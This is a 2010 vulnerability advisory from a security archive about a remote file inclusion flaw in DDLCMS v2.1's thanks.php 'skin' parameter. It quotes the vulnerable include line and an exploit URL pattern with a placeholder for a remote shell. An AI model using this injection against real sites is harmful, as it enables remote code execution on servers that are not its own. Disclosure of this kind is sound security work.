DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability

2010.06.04
Credit: eidelweiss
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================== DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability ============================================================== 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.ddlcms.com download: http://www.ddlcms.com/download.php Author: eidelweiss Contact: g1xsystem[at]windowslive.com ===================================================================== -=[ Vuln Code ]=- [-] /thanks.php include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46 include(WWWROOT . 'leftside.php'); ===================================================================== -=[ P0C ]=- "skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL -=[ exploit ]=- http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=========================

References:

http://eidelweiss-advisories.blogspot.com/2010/06/ddlcms-v21-skin-remote-file-inclusion.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top